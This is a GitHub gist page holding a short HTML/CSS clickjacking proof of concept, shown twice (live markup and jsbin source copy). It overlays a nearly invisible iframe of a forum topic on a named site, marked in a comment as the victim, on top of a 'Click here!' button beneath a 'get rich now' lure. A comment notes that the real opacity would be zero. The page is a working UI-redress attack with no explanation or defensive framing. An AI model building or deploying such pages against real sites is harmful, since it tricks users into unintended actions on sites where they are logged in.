Skip to content

Instantly share code, notes, and snippets.

@onyxblade
Created October 4, 2018 17:04
Show Gist options
  • Save onyxblade/c60a72a637e21a99c6991e8b85c3362c to your computer and use it in GitHub Desktop.
Save onyxblade/c60a72a637e21a99c6991e8b85c3362c to your computer and use it in GitHub Desktop.
// source https://jsbin.com
<style>
.parent {
margin-top: -690px;
margin-left: -360px;
position: absolute;
opacity: 0.2; /* in real opacity:0 */
z-index: 1;
}
</style>
<div>Click to get rich now:</div>
<br>
<!-- The url from the victim site -->
<div class="parent">
<iframe src="https://pub.bitrabbit.com/groups/water/topics/91109" height="1000px" width="1000px"></iframe>
</div>
<button>Click here!</button>
<script id="jsbin-source-html" type="text/html"><style>
.parent {
margin-top: -690px;
margin-left: -360px;
position: absolute;
opacity: 0.2; /* in real opacity:0 */
z-index: 1;
}
</style>
<div>Click to get rich now:</div>
<br>
<\!-- The url from the victim site -->
<div class="parent">
<iframe src="https://pub.bitrabbit.com/groups/water/topics/91109" height="1000px" width="1000px"></iframe>
</div>
<button>Click here!</button>
</script>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment